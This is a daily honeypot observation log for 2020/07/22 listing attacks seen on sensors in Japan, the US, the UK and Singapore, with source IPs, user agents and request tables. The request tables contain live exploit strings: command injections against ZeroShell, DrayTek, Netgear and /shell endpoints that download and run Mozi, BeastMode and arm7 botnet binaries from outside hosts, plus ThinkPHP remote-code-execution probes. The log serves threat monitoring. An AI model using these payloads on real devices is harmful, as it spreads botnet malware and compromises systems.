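Honeypot (tentative) observation log for 2020/07/22.
Highlights
Location:JP
The following were observed:
- Access targeting a vulnerability in DrayTek products
- Access targeting a GPON router vulnerability
- Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
- Access targeting the PHPUnit vulnerability (CVE-2017-9841)
- Access targeting a ThinkPHP vulnerability
- Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
- Scanning by XTC
- Scanning by zgrab
- Scanning for Apache Solr
- Scanning for Apache Tomcat
- Scanning for phpMyAdmin
- Unauthorized traffic involving 5[.]188[.]210[.]227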
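Location:US
The following were observed:
- Access targeting a vulnerability in Asustor NAS
- Access targeting a vulnerability in ASUS modems
- Access targeting a vulnerability in AVTECH IP Camera/NVR/DVR Devices
- Access targeting a vulnerability in Dell KACE Systems Management Appliance
- Access targeting a vulnerability in DLink products
- Access targeting a vulnerability in EnGenius EnShare IoT Gigabit Cloud Service
- Access targeting a vulnerability in Enigma NMS
- Access targeting a vulnerability in Geutebruck IP Camera
- Access targeting a vulnerability in GoAhead IP Camera
- Access targeting a GPON router vulnerability
- Access targeting a vulnerability in Huawei routers
- Access targeting a vulnerability in HooToo TripMate routers
- Access targeting a vulnerability in LG Supersign
- Access targeting a vulnerability in Linear eMerge E3 products
- Access targeting a vulnerability in Linksys E-series devices
- Access targeting a vulnerability in the MiCasa VeraLite Smart home controller
- Access targeting a vulnerability in NetGain Enterprise Manager
- Access targeting a vulnerability in Netgear ReadyNas
- Access targeting a vulnerability in NUUO NVRmini
- Access targeting a vulnerability in OpenDreamBox
- Access targeting the Oracle WebLogic vulnerability (CVE-2017-3506)
- Access targeting the Oracle WebLogic vulnerability (CVE-2019-2725)
- Access targeting the Schneider Electric U.motion LifeSpace Management System vulnerability (CVE-2018-7841)
- Access targeting a vulnerability in Shenzhen TVT products
- Access targeting a ThinkPHP vulnerability
- Access targeting a vulnerability in Vacron NVR Devices
- Access targeting the VMware NSX SD-WAN Edge vulnerability (CVE-2018-6961)
- Access targeting a vulnerability in WePresent Wireless Presentation System
- Access targeting the Wireless Presentation System vulnerability (CVE-2019-3929)
- Access targeting a vulnerability in ZTE routers
- Access targeting the ZyXEL NAS product vulnerability (CVE-2020-9054)
- Scanning by Googlebot
- Scanning by GoScraper
- Access with the UserAgent "Hello, World"
- Access with the UserAgent "Hello, world"

The following access to /shell was observed: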
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
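Location:UK
The following were observed:
- Access targeting a vulnerability in DrayTek products
- Access targeting a vulnerability in NetGear products
- Access targeting the PHPUnit vulnerability (CVE-2017-9841)
- Access targeting a ThinkPHP vulnerability
- Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
- Scanning by polaris botnet
- Scanning by zgrab
- Scanning for Apache Solr
- Scanning for Apache Tomcat
- Access with the UserAgent "Hello, world"

The following access to /shell was observed: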
cd /tmp; rm -rf *; wget 95.213.165.45/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
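Location:SG
The following were observed:
- Access targeting a GPON router vulnerability
- Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
- Access targeting the PHPUnit vulnerability (CVE-2017-9841)
- Access targeting a ThinkPHP vulnerability
- Access targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
- Scanning by zgrab
- Scanning for Apache Solr
- Scanning for Apache Tomcat
- Unauthorized traffic involving 5[.]188[.]210[.]227
- Access with the UserAgent "Hello, world"

The following access to /shell was observed: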
cd /tmp; rm -rf *; wget 165.22.101.145/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
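Other
Access count trend
JP: total accesses: 60 (change from previous day: -37)
US: total accesses: 242 (change from previous day: +102)
UK: total accesses: 23 (change from previous day: -12)
SG: total accesses: 28 (change from previous day: +13)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.
Location:JP
Source IP addresses
Count | Source IP address | Country |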
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 5.188.210.227 | Russia |
6 | 52.176.48.56 | United States |
3 | 59.127.105.216 | Taiwan |
1 | 93.174.93.139 | Netherlands |
3 | 94.230.208.147 | Switzerland |
1 | 114.113.112.92 | China |
1 | 162.243.128.13 | United States |
27 | 180.240.191.222 | Singapore |
7 | 195.54.160.21 | Russia |
5 | 195.154.171.182 | France |
1 | 196.202.71.90 | Egypt |
1 | 200.119.45.66 | Colombia |
UserAgent list
Count | UserAgent |
---|---|
40 | - |
3 | Go-http-client/1.1 |
5 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | - | ||
3 | \x16\x03\x01 | ||
2 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
27 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /muieblackcat | HTTP/1.1 |
1 | GET | /portal/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /v2/_catalog | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | HTTP/1.1 | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
Source IP addresses
Count | Source IP address | Country |
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 37.49.224.33 | Estonia |
1 | 49.89.3.63 | China |
1 | 61.219.11.153 | Taiwan |
1 | 80.82.70.118 | Netherlands |
197 | 89.144.47.5 | Germany |
1 | 93.174.93.139 | Netherlands |
1 | 104.131.8.207 | United States |
1 | 104.131.13.221 | United States |
20 | 107.167.7.226 | United States |
10 | 129.28.172.238 | China |
4 | 139.205.177.97 | China |
1 | 222.240.117.51 | China |
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
24 | GoScraper |
173 | Googlebot/2.1 (+http://www.google.com/bot.html) |
1 | Hello, World |
1 | Hello, world |
4 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488) |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 |
20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
3 | \x16\x03\x01 | ||
1 | \x16\x03\x02\x01o\x01 | ||
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.local | HTTP/1.1 |
1 | GET | /.production | HTTP/1.1 |
1 | GET | /.remote | HTTP/1.1 |
1 | GET | //app/.env | HTTP/1.1 |
1 | GET | //apps/.env | HTTP/1.1 |
1 | GET | //assets/.env | HTTP/1.1 |
1 | GET | //config/.env | HTTP/1.1 |
1 | GET | //core/.env | HTTP/1.1 |
1 | GET | //core/Datavase/.env | HTTP/1.1 |
1 | GET | //core/app/.env | HTTP/1.1 |
1 | GET | //cron/.env | HTTP/1.1 |
1 | GET | //cronlab/.env | HTTP/1.1 |
1 | GET | //database/.env | HTTP/1.1 |
1 | GET | //lab/.env | HTTP/1.1 |
1 | GET | //lib/.env | HTTP/1.1 |
1 | GET | //saas/.env | HTTP/1.1 |
1 | GET | //sitemaps/.env | HTTP/1.1 |
1 | GET | //uploads/.env | HTTP/1.1 |
1 | GET | //vendor/.env | HTTP/1.1 |
1 | GET | /Diagnostics.asp | HTTP/1.1 |
1 | GET | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /Main_Analysis_Content.asp | HTTP/1.1 |
2 | GET | /NonExistence | HTTP/1.1 |
1 | GET | /OvCgi/connectedNodes.ovpl | HTTP/1.1 |
1 | GET | /SGPAdmin/fileRequest | HTTP/1.1 |
1 | GET | /SetSmarcardSettings.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /UD/act | HTTP/1.1 |
1 | GET | /VhttpdMgr | HTTP/1.1 |
1 | GET | /_async/AsyncResponseServiceHttps | HTTP/1.1 |
1 | GET | /_search | HTTP/1.1 |
1 | GET | /action.php | HTTP/1.1 |
1 | GET | /actionHandler/ajax_network_diagnostic_tools.php | HTTP/1.1 |
1 | GET | /adm.php | HTTP/1.1 |
1 | GET | /admin.cgi | HTTP/1.1 |
1 | GET | /adminer.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi | HTTP/1.1 |
1 | GET | /api/backup/logout.cgi | HTTP/1.1 |
2 | GET | /api/project/repo/log/graph/ | HTTP/1.1 |
1 | GET | /app/lan/BeforeLoginCn.js | HTTP/1.1 |
1 | GET | /apply.cgi | HTTP/1.1 |
1 | GET | /apps/a3/cfg_ethping.cgi | HTTP/1.1 |
1 | GET | /awcuser/cgi-bin/vcs | HTTP/1.1 |
1 | GET | /awstatstotals/awstatstotals.php | HTTP/1.1 |
1 | GET | /ayefeaturesconvert.js | HTTP/1.1 |
1 | GET | /boaform/admin/formPing | HTTP/1.1 |
1 | GET | /board.cgi | HTTP/1.1 |
1 | GET | /boardData102.php | HTTP/1.1 |
1 | GET | /boardData103.php | HTTP/1.1 |
1 | GET | /boardDataJP.php | HTTP/1.1 |
1 | GET | /boardDataNA.php | HTTP/1.1 |
2 | GET | /boardDataWW.php | HTTP/1.1 |
1 | GET | /card_scan_decoder.php | HTTP/1.0 |
1 | GET | /card_scan_decoder.php | HTTP/1.1 |
1 | GET | /ccbill/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi | HTTP/1.1 |
1 | GET | /cgi-bin/ViewLog.asp | HTTP/1.1 |
1 | GET | /cgi-bin/admin/servetest | HTTP/1.1 |
1 | GET | /cgi-bin/adv_remotelog.asp | HTTP/1.1 |
1 | GET | /cgi-bin/apply.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/awstats.pl | HTTP/1.1 |
1 | GET | /cgi-bin/bconf.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/board.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/ccbill/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/cgiServer.exx | HTTP/1.1 |
1 | GET | /cgi-bin/cgi_system | HTTP/1.1 |
2 | GET | /cgi-bin/cgi_system?cmd=saveconfig | HTTP/1.1 |
1 | GET | /cgi-bin/ddns_start.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/diagnostic.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/file_transfer.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/getddnsattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getinetattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getnettype.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getupnp.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getwifiattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getwifistatus.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/img.pl | HTTP/1.1 |
1 | GET | /cgi-bin/inetconfig.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/iptest.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet | HTTP/1.1 |
1 | GET | /cgi-bin/listwifiap.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/api/xqsmarthome/request_mitv | HTTP/1.1 |
2 | GET | /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/expert/maintenance/diagnostic/nslookup | HTTP/1.1 |
1 | GET | /cgi-bin/luci/;stok=a714f92968ab8cc6466f87c8618cfc30/api/misns/wifi_access | HTTP/1.1 |
1 | GET | /cgi-bin/luci/expert/maintenance/diagnostic/nslookup | HTTP/1.1 |
1 | GET | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/masterCGI | HTTP/1.1 |
1 | GET | /cgi-bin/nobody/Search.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/operator/servetest | HTTP/1.1 |
1 | GET | /cgi-bin/p2p.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/pages/maintenance/logSetting/logSet.asp | HTTP/1.1 |
1 | GET | /cgi-bin/paraconf.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/preview_email.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/protected/discover_and_manage.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/rdfs.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/scanwifi.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/script | HTTP/1.1 |
1 | GET | /cgi-bin/setadslattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/setddnsattr.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/setinetattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/setwifiattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/spboard/board.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/statuswml.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/system.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/test | HTTP/1.1 |
1 | GET | /cgi-bin/tools_time.asp | HTTP/1.1 |
1 | GET | /cgi-bin/upnp_start.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/webcm | HTTP/1.1 |
1 | GET | /cgi-bin/webctrl.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/wifimode.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/wifitest.cgi | HTTP/1.1 |
1 | GET | /command.php | HTTP/1.1 |
1 | GET | /csspwn.php | HTTP/1.1 |
1 | GET | /ctrlt/DeviceUpgrade_1 | HTTP/1.1 |
2 | GET | /debug.cgi | HTTP/1.1 |
1 | GET | /diagnostic.php | HTTP/1.1 |
1 | GET | /dnslookup.cgi | HTTP/1.1 |
1 | GET | /dogfood/mail/spell.php | HTTP/1.1 |
1 | GET | /editBlackAndWhiteList | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /getpage.gch | HTTP/1.1 |
1 | GET | /global_data/ | HTTP/1.1 |
1 | GET | /globe | HTTP/1.1 |
2 | GET | /goform/formSysCmd | HTTP/1.1 |
2 | GET | /goform/mp | HTTP/1.1 |
1 | GET | /goip/cron.htm | HTTP/1.1 |
1 | GET | /handle_iscsi.php | HTTP/1.1 |
1 | GET | /hndBlock.cgi | HTTP/1.1 |
1 | GET | /hndUnblock.cgi | HTTP/1.1 |
1 | GET | /horde/imp/test.php | HTTP/1.1 |
1 | GET | /html/SetSmarcardSettings.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /imp/test.php | HTTP/1.1 |
1 | GET | /incl/image_test.shtml | HTTP/1.1 |
1 | GET | /index.html?findcli=-1 | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /js/Multi_Language.js | HTTP/1.1 |
1 | GET | /language/Swedish | HTTP/1.1 |
1 | GET | /linuxki/experimental/vis/kivis.php | HTTP/1.1 |
2 | GET | /login.action | HTTP/1.1 |
1 | GET | /login.cgi | HTTP/1.1 |
1 | GET | /login.gch | HTTP/1.1 |
1 | GET | /login.php | HTTP/1.1 |
1 | GET | /login_handler.php | HTTP/1.1 |
2 | GET | /maintenance/controllerFlirSystem.php | HTTP/1.1 |
1 | GET | /maker/snwrite.cgi | HTTP/1.1 |
1 | GET | /mnt_ping.cgi | HTTP/1.1 |
1 | GET | /moadmin/moadmin.php | HTTP/1.1 |
1 | GET | /monitor/op5/nacoma/command_test.php | HTTP/1.1 |
2 | GET | /nagios/cgi-bin/statuswml.cgi | HTTP/1.1 |
1 | GET | /ona/ | HTTP/1.1 |
1 | GET | /op5config/welcome | HTTP/1.1 |
1 | GET | /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2 | HTTP/1.1 |
1 | GET | /page/maintenance/lanSettings/dns | HTTP/1.1 |
1 | GET | /pages/systemcall.php | HTTP/1.1 |
1 | GET | /parse_xml.cgi | HTTP/1.1 |
1 | GET | /phpMoAdmin/moadmin.php | HTTP/1.1 |
1 | GET | /phpmoadmin/moadmin.php | HTTP/1.1 |
1 | GET | /picsdesc.xml | HTTP/1.1 |
1 | GET | /ping.cgi | HTTP/1.1 |
1 | GET | /portal/apis/aggrecate_js.cgi | HTTP/1.1 |
1 | GET | /protocol.csp | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' | HTTP/1.1 |
1 | GET | /qsr_server/device/getThumbnail | HTTP/1.1 |
1 | GET | /qsrserver/device/getThumbnail | HTTP/1.1 |
1 | GET | /recordings/misc/callme_page.php | HTTP/1.1 |
1 | GET | /repository/annotate | HTTP/1.1 |
1 | GET | /sarFILE/style.css | HTTP/1.1 |
1 | GET | /scripts/ajaxPortal.lua | HTTP/1.1 |
1 | GET | /scripts/rpc.php | HTTP/1.1 |
1 | GET | /sdwan/nitro/v1/config/get_package_file | HTTP/1.1 |
1 | GET | /service/krashrpt.php | HTTP/1.1 |
1 | GET | /setSystemCommand | HTTP/1.1 |
2 | GET | /set_ftp.cgi | HTTP/1.1 |
1 | GET | /setup.cgi | HTTP/1.1 |
1 | GET | /setup.xml | HTTP/1.1 |
1 | GET | /shell | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /shell?echo+ukrmoney | HTTP/1.1 |
2 | GET | /smartdomuspad/modules/reporting/track_import_export.php | HTTP/1.1 |
1 | GET | /smb_scheduler/cdr.htm | HTTP/1.1 |
1 | GET | /soap.cgi | HTTP/1.1 |
1 | GET | /softnas/snserver/snserv.php | HTTP/1.1 |
1 | GET | /stainfo.cgi | HTTP/1.1 |
1 | GET | /system.ini?loginuse&loginpas | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /tmBlock.cgi | HTTP/1.1 |
1 | GET | /tmUnblock.cgi | HTTP/1.1 |
1 | GET | /u/jsp/tools/exec.jsp | HTTP/1.1 |
1 | GET | /uapi-cgi/admin/testaction.cgi | HTTP/1.1 |
1 | GET | /uapi-cgi/viewer/admin/testaction.cgi | HTTP/1.1 |
2 | GET | /uapi-cgi/viewer/simple_loglistjs.cgi | HTTP/1.1 |
1 | GET | /uapi-cgi/viewer/testaction.cgi | HTTP/1.1 |
2 | GET | /upgrade_handle.php | HTTP/1.1 |
2 | GET | /upnp/control/hag | HTTP/1.1 |
1 | GET | /user/register | HTTP/1.1 |
1 | GET | /utility.cgi | HTTP/1.1 |
1 | GET | /web/cgi-bin/usbinteract.cgi | HTTP/1.1 |
1 | GET | /webadmin/script | HTTP/1.1 |
1 | GET | /wls-wsat/CoordinatorPortType | HTTP/1.1 |
1 | GET | /wp-content/plugins/dzs-videogallery/img.php | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
Source IP addresses
Count | Source IP address | Country |
---|---|---|
1 | 60.246.11.234 | Macao |
4 | 80.82.77.33 | Netherlands |
1 | 89.248.168.39 | Netherlands |
1 | 93.174.93.139 | Netherlands |
1 | 96.69.158.193 | United States |
1 | 98.235.253.175 | United States |
2 | 143.92.32.86 | Singapore |
1 | 162.243.128.147 | United States |
1 | 190.94.192.8 | Venezuela |
1 | 192.241.233.249 | United States |
7 | 195.54.160.21 | Russia |
1 | 200.217.4.9 | Brazil |
1 | 223.149.252.240 | China |
UserAgent list
Count | UserAgent |
---|---|
9 | - |
1 | Hello, world |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | polaris botnet |
1 | python-requests/2.23.0 |
1 | python-requests/2.24.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | g[.]alicdn[.]com/:443 | HTTP/1.1 |
1 | CONNECT | httpbin[.]org/:443 | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
2 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.45/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
Source IP addresses
Count | Source IP address | Country |
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 5.188.210.227 | Russia |
1 | 31.182.159.17 | Poland |
1 | 93.174.93.139 | Netherlands |
1 | 102.43.18.31 | Egypt |
1 | 159.18.94.65 | Canada |
1 | 161.97.81.64 | Germany |
1 | 162.243.128.57 | United States |
1 | 192.241.238.37 | United States |
14 | 195.54.160.21 | Russia |
3 | 195.154.171.182 | France |
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Hello, world |
3 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | \x16\x03\x01 | ||
1 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /hudson | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | OPTIONS | * | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |